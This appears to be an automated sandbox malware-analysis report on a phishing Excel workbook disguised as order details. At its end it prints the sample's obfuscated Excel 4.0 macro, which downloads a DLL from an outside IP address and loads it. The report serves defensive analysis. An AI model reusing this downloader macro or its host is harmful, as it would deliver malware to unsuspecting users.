Windows Analysis Report Total_order_details_1231333.xlsb
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Section loaded: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process created: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | DLL Side-Loading1 | Process Injection1 | Regsvr321 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Masquerading1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.180.199.121 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONSUS | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 439079 |
Start date: | 23.06.2021 |
Start time: | 17:14:26 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 13s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Total_order_details_1231333.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSB@3/9@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.180.199.121 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTING-SOLUTIONSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134914 |
Entropy (8bit): | 5.367820976698576 |
Encrypted: | false |
SSDEEP: | 1536:NcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:lEQ9DQW+zvXO1 |
MD5: | 59652EDADBC6E26BDF1B1288616DF0F9 |
SHA1: | 68E427BB05F13BAE8F2F6547212302F15F62301E |
SHA-256: | A0C0604D3AEBF53DC7D8F62E689022C1866CC135D11295882B24705A6E9157B0 |
SHA-512: | FA7B8F7801DA6C99579E9D39F698278FBEBB699FCA4E1DBDAE901123E6C73818ECFD61C036F19B5144102000BAC18DBF9628F7EC474D1B9D9352CFC8CF469CFB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80025 |
Entropy (8bit): | 7.896060743310021 |
Encrypted: | false |
SSDEEP: | 1536:zZMVmEKjBX9U8fWGHzDmf5TOlMVGoIahaDHTU6hryF70KiiAeWR:empX9U8fW2XmfU2sTU2yF70KiiW |
MD5: | 4E14AE8B3DDDB0449E20FA26C7934DFB |
SHA1: | AD46975613DAA412CD5555AFCAEFE552E39CB154 |
SHA-256: | F567AF0905B7ADF15ABBC2365C022203D5D2D5A64BCF81F0BFD2A91B46A4C41A |
SHA-512: | 10EB07D041FBDD251D92055721EE1EEBEF51C025E3890A7FE8E74CEF60419403D739D1A7C6DBD33BEA6F60FD36C29A0ED43D62B4C71FDB9D72AE28B2952319E7 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.870422721255186 |
TrID: |
|
File name: | Total_order_details_1231333.xlsb |
File size: | 64436 |
MD5: | 7a915d04a60c318f37d2586b02587a26 |
SHA1: | 695dc190cd70d39a16a003400581353065f964af |
SHA256: | d8c12fb3fc8f75b90c2a11a84b190c7fb3736f08c78a45ab336bacd39f19d3b9 |
SHA512: | fe910bca6f0542d3d0c8933f927dd992c488d5e5214f8853763f43cf6bfa97b0e1b971b9eb53a65b64db0b6a572c8a1bed943d78a7054b020f13b9a4b966768d |
SSDEEP: | 1536:uj3yHgwWlMVGoIahaDHTU6hryF70liWWGH0AeWj:uj3y02sTU2yF70liWW20a |
File Content Preview: | PK..........!.L.......>.......[Content_Types].xml ...(...........................................................................................................''............................................................................................ |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Total_order_details_1231333.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
CALL(U, Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14, Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46, 0, ht, ..\kdldyeff.dll, 0, 0)
"=CALL(BQ18&Sheet2!BK50&Sheet2!BL50&BD42&BE44&BF44,Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14,Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46,0,BH28&BH29&BH30&BH31,BH41,0,0)",,,,,,,,,,,,,,,,,,,,,,=Sheet2!BA14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,185.180.199.121/sat1_0609_2.,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\kdldyeff.dll,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,C,B,B,,,,,,,,,,,
